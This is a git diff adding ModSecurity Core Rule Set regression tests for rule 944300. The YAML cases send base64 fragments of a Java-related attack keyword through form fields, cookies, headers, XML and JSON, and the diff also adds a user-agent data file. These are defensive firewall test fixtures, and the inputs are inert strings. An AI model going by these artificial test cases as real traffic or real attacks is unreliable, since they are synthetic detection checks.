"en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HdoaWxlY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-315 + desc: "Nested XML element value includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HdoaWxlY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-316 + desc: "Content-Type text/plain includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=HdoaWxlY2xvc3VyZQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-317 + desc: "Content-Type application/json arg value includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"HdoaWxlY2xvc3VyZQ\"}" + output: + 
log_contains: "id \"944300\"" + - test_title: 944300-318 + desc: "Content-Type application/json arg name includes keyword HdoaWxlY2xvc3VyZQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"HdoaWxlY2xvc3VyZQ\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-319 + desc: "Argument test includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=B3aGlsZWNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-320 + desc: "Argument name includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "B3aGlsZWNsb3N1cmU=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-321 + desc: "Cookie test includes keyword B3aGlsZWNsb3N1cmU" 
+ stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=B3aGlsZWNsb3N1cmU + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-322 + desc: "Cookie name includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: B3aGlsZWNsb3N1cmU=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-323 + desc: "Request header test includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: B3aGlsZWNsb3N1cmU + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-324 + desc: "XML attribute value includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + 
headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-325 + desc: "XML element value includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "B3aGlsZWNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-326 + desc: "Nested XML element value includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "B3aGlsZWNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-327 + desc: "Content-Type text/plain includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" 
+ Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=B3aGlsZWNsb3N1cmU" + output: + log_contains: "id \"944300\"" + - test_title: 944300-328 + desc: "Content-Type application/json arg value includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"B3aGlsZWNsb3N1cmU\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-329 + desc: "Content-Type application/json arg name includes keyword B3aGlsZWNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"B3aGlsZWNsb3N1cmU\": \"test\"}" + output: + log_contains: "id \"944300\"" diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/base_positive_rules.py b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/base_positive_rules.py similarity index 100% rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/base_positive_rules.py rename to src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/base_positive_rules.py 
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/positivetest-light.yaml.skeleton b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/positivetest-light.yaml.skeleton
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/positivetest-light.yaml.skeleton
rename to src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/positivetest-light.yaml.skeleton
diff --git a/src/common/core/modsecurity/files/coreruleset/tests/regression/tests/positivetest.yaml.skeleton b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/positivetest.yaml.skeleton
similarity index 100%
rename from src/common/core/modsecurity/files/coreruleset/tests/regression/tests/positivetest.yaml.skeleton
rename to src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/positivetest.yaml.skeleton
diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/utils/data/popularUAs.data b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/utils/data/popularUAs.data
new file mode 100644
index 000000000..4675a26b2
--- /dev/null
+++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/utils/data/popularUAs.data
@@ -0,0 +1,586 @@ +AdsBot-Google ( http://www.google.com/adsbot.html) +Avant Browser/1.2.789rel1 (http://www.avantbrowser.com) +Baiduspider ( http://www.baidu.com/search/spider.htm) +BlackBerry7100i/4.1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/103 +BlackBerry7520/4.0.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/5.0.3.3 UP.Link/5.1.2.12 (Google WAP Proxy/1.0) +BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0 +BlackBerry8320/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/100 +BlackBerry8330/4.3.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/105 +BlackBerry9000/4.6.0.167 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/102 +BlackBerry9530/4.7.0.167 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/102 UP.Link/6.3.1.20.0 +BlackBerry9700/5.0.0.351 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/123 +Bloglines/3.1 (http://www.bloglines.com) +CSSCheck/1.2.2 +DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; http://www.google.com/bot.html) +DoCoMo/2.0 SH901iC(c100;TB;W24H12) +Download Demon/3.5.0.11 +ELinks (0.4.3; NetBSD 3.0.2PATCH sparc64; 141x19) +ELinks (0.4pre5; Linux 2.6.10-ac7 i686; 80x33) +ELinks/0.12~pre5-4 +ELinks/0.9.3 (textmode; Linux 2.6.9-kanotix-8 i686; 127x41) +EmailWolf 1.00 +FAST-WebCrawler/3.8 (crawler at trd dot overture dot com; http://www.alltheweb.com/help/webmaster/crawler) +FeedFetcher-Google; ( http://www.google.com/feedfetcher.html) +Gaisbot/3.0 (robot@gais.cs.ccu.edu.tw; http://gais.cs.ccu.edu.tw/robot.php) +Googlebot-Image/1.0 +Googlebot-News +Googlebot-Video/1.0 +Googlebot/2.1 ( http://www.googlebot.com/bot.html) +Gregarius/0.5.2 ( http://devlog.gregarius.net/docs/ua) +Gulper Web Bot 0.2.4 (www.ecsl.cs.sunysb.edu/~maxim/cgi-bin/Link/GulperBot) +HTC-ST7377/1.59.502.3 (67150) Opera/9.50 (Windows NT 5.1; U; en) UP.Link/6.3.1.17.0 +HTC_Dream Mozilla/5.0 (Linux; U; Android 1.5; en-ca; Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile 
Safari/525.20.1 +HTC_Dream Mozilla/5.0 (Linux; U; Android 1.5; en-ca; Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 +HTMLParser/1.6 +Java/1.6.0_13 +Jigsaw/2.2.5 W3C_CSS_Validator_JFouffa/2.0 +Konqueror/3.0-rc4; (Konqueror/3.0-rc4; i686 Linux;;datecode) +LG-GC900/V10a Obigo/WAP2.0 Profile/MIDP-2.1 Configuration/CLDC-1.1 +LG-LX550 AU-MIC-LX550/2.0 MMP/2.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 +Links (2.1pre15; FreeBSD 5.3-RELEASE i386; 196x84) +Links (2.1pre15; Linux 2.4.26 i686; 158x61) +Links (2.3pre1; Linux 2.6.38-8-generic x86_64; 170x48) +Links/0.9.1 (Linux 2.4.24; i386;) +Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.12 +Lynx/2.8.7dev.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8d +MOT-L7v/08.B7.5DR MIB/2.2.1 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0 +MOT-V177/0.1.75 UP.Browser/6.2.3.9.c.12 (GUI) MMP/2.0 UP.Link/6.3.1.13.0 +MOT-V9mm/00.62 UP.Browser/6.2.3.4.c.1.123 (GUI) MMP/2.0 +MOTORIZR-Z8/46.00.00 Mozilla/4.0 (compatible; MSIE 6.0; Symbian OS; 356) Opera 8.65 [it] UP.Link/6.3.0.0.0 +MSIE (MSIE 6.0; X11; Linux; i686) Opera 7.23 +Mediapartners-Google +Microsoft URL Control - 6.00.8862 +Midori/0.1.10 (X11; Linux i686; U; en-us) WebKit/(531).(2) +Mozilla/1.22 (compatible; MSIE 5.01; PalmOS 3.0) EudoraWeb 2.1 +Mozilla/2.0 (compatible; Ask Jeeves/Teoma) +Mozilla/2.02E (Win95; U) +Mozilla/3.0 (compatible; NetPositive/2.1.1; BeOS) +Mozilla/3.01Gold (Win95; I) +Mozilla/4.0 (PDA; PalmOS/sony/model prmr/Revision:1.1.54 (en)) NetFront/3.0 +Mozilla/4.0 (PSP (PlayStation Portable); 2.00) +Mozilla/4.0 (compatible; Dillo 3.0) +Mozilla/4.0 (compatible; GoogleToolbar 4.0.1019.5266-big; Windows XP 5.1; MSIE 6.0.2900.2180) +Mozilla/4.0 (compatible; Linux 2.6.22) NetFront/3.4 Kindle/2.0 (screen 600x800) +Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; MDA Pro/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1) +Mozilla/4.0 (compatible; MSIE 5.0; Series80/2.0 Nokia9500/4.51 Profile/MIDP-2.0 Configuration/CLDC-1.1) 
+Mozilla/4.0 (compatible; MSIE 5.15; Mac_PowerPC) +Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90) +Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0 ) +Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; PalmSource/hspr-H102; Blazer/4.0) 16;320x320 +Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; PalmSource/hspr-H102; Blazer/4.0) 16;320x320 +Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.12; Microsoft ZuneHD 4.3) +Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.12; Microsoft ZuneHD 4.3) +Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.12; Microsoft ZuneHD 4.3) +Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11) +Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11) +Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11) Sprint:PPC6800 +Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11) Sprint:PPC6800 +Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11) XV6800 +Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 8.12; MSIEMobile6.0) +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.0 +Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) +Mozilla/4.0 (compatible; MSIE 6.0; j2me) ReqwirelessWeb/3.5 +Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser; Avant Browser; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) +Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) +Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0) +Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/5.0) +Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Maxthon 2.0) +Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0) +Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Trident/7.0; .NET4.0E; .NET4.0C) +Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0) +Mozilla/4.0 
(compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0) Asus;Galaxy6 +Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0) Asus;Galaxy6 +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0) +Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0) +Mozilla/4.1 (compatible; MSIE 5.0; Symbian OS; Nokia 6600;452) Opera 6.20 [en-US] +Mozilla/4.77 [en] (X11; I; IRIX;64 6.5 IP30) +Mozilla/4.8 [en] (Windows NT 5.1; U) +Mozilla/4.8 [en] (X11; U; SunOS; 5.7 sun4u) +Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0 +Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1 +Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1 +Mozilla/5.0 (BB10; Touch) AppleWebKit/537.10+ (KHTML, like Gecko) Version/10.1.0.2342 Mobile Safari/537.10+ +Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20060702 SeaMonkey/1.5a +Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en) AppleWebKit/534.1 (KHTML, Like Gecko) Version/6.0.0.141 Mobile Safari/534.1 +Mozilla/5.0 (Linux U; en-US) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) Version/4.0 Kindle/3.0 (screen 600x800; rotate) +Mozilla/5.0 (Linux; Android 4.1.2; SHV-E250S Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.82 Mobile Safari/537.36 +Mozilla/5.0 (Linux; Android 4.4; Nexus 5 Build/BuildID) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 +Mozilla/5.0 (Linux; Android 4.4; Nexus 5 Build/BuildID) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 +Mozilla/5.0 (Linux; U; Android 0.5; en-us) AppleWebKit/522 (KHTML, like Gecko) Safari/419.3 +Mozilla/5.0 (Linux; U; Android 1.0; en-us; dream) AppleWebKit/525.10 (KHTML, like 
Gecko) Version/3.0.4 Mobile Safari/523.12.2 +Mozilla/5.0 (Linux; U; Android 1.1; en-gb; dream) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2 +Mozilla/5.0 (Linux; U; Android 1.5; de-ch; HTC Hero Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 +Mozilla/5.0 (Linux; U; Android 1.5; de-de; Galaxy Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 +Mozilla/5.0 (Linux; U; Android 1.5; de-de; Galaxy Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 +Mozilla/5.0 (Linux; U; Android 1.5; de-de; HTC Magic Build/PLAT-RC33) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 FirePHP/0.3 +Mozilla/5.0 (Linux; U; Android 1.5; en-gb; T-Mobile_G2_Touch Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 +Mozilla/5.0 (Linux; U; Android 1.5; en-us; SPH-M900 Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 +Mozilla/5.0 (Linux; U; Android 1.5; en-us; T-Mobile G1 Build/CRB43) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari 525.20.1 +Mozilla/5.0 (Linux; U; Android 1.5; en-us; htc_bahamas Build/CRB17) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 +Mozilla/5.0 (Linux; U; Android 1.5; en-us; sdk Build/CUPCAKE) AppleWebkit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 +Mozilla/5.0 (Linux; U; Android 1.5; fr-fr; GT-I5700 Build/CUPCAKE) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 +Mozilla/5.0 (Linux; U; Android 1.6; en-us; HTC_TATTOO_A3288 Build/DRC79) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 +Mozilla/5.0 (Linux; U; Android 1.6; en-us; SonyEricssonX10i Build/R1AA056) AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 +Mozilla/5.0 (Linux; U; Android 1.6; es-es; SonyEricssonX10i Build/R1FA016) 
AppleWebKit/528.5 (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1 +Mozilla/5.0 (Linux; U; Android 2.0.1; de-de; Milestone Build/SHOLS_U2_01.14.0) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17 +Mozilla/5.0 (Linux; U; Android 2.0; en-us; Droid Build/ESD20) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17 +Mozilla/5.0 (Linux; U; Android 2.0; en-us; Droid Build/ESD20) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17 +Mozilla/5.0 (Linux; U; Android 2.0; en-us; Droid Build/ESD20) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17 +Mozilla/5.0 (Linux; U; Android 2.0; en-us; Milestone Build/ SHOLS_U2_01.03.1) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17 +Mozilla/5.0 (Linux; U; Android 2.1-update1; de-de; HTC Desire 1.19.161.5 Build/ERE27) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17 +Mozilla/5.0 (Linux; U; Android 2.1; en-us; HTC Legend Build/cupcake) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17 +Mozilla/5.0 (Linux; U; Android 2.1; en-us; Nexus One Build/ERD62) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17 +Mozilla/5.0 (Linux; U; Android 2.1; en-us; Nexus One Build/ERD62) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17 +Mozilla/5.0 (Linux; U; Android 2.2; en-ca; GT-P1000M Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 +Mozilla/5.0 (Linux; U; Android 2.2; en-ca; GT-P1000M Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 +Mozilla/5.0 (Linux; U; Android 2.2; en-ca; GT-P1000M Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 +Mozilla/5.0 (Linux; U; Android 2.2; en-us; ADR6300 Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 +Mozilla/5.0 (Linux; U; Android 2.2; en-us; ADR6300 Build/FRF91) AppleWebKit/533.1 (KHTML, 
like Gecko) Version/4.0 Mobile Safari/533.1 +Mozilla/5.0 (Linux; U; Android 2.2; en-us; Droid Build/FRG22D) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 +Mozilla/5.0 (Linux; U; Android 2.2; en-us; Nexus One Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 +Mozilla/5.0 (Linux; U; Android 2.2; en-us; SCH-I800 Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 +Mozilla/5.0 (Linux; U; Android 2.2; en-us; SCH-I800 Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 +Mozilla/5.0 (Linux; U; Android 2.2; en-us; Sprint APA9292KT Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 +Mozilla/5.0 (Linux; U; Android 2.2; en-us; Sprint APA9292KT Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 +Mozilla/5.0 (Linux; U; Android 2.3.3; en-us ; LS670 Build/GRI40) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1/UCBrowser/8.6.1.262/145/355 +Mozilla/5.0 (Linux; U; Android 2.3.4; en-us; BNTV250 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Safari/533.1 +Mozilla/5.0 (Linux; U; Android 3.0.1; en-us; GT-P7100 Build/HRI83) AppleWebkit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13 +Mozilla/5.0 (Linux; U; Android 3.0.1; en-us; GT-P7100 Build/HRI83) AppleWebkit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13 +Mozilla/5.0 (Linux; U; Android 3.0.1; fr-fr; A500 Build/HRI66) AppleWebKit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13 +Mozilla/5.0 (Linux; U; Android 3.0.1; fr-fr; A500 Build/HRI66) AppleWebKit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13 +Mozilla/5.0 (Linux; U; Android 3.0.1; fr-fr; A500 Build/HRI66) AppleWebKit/534.13 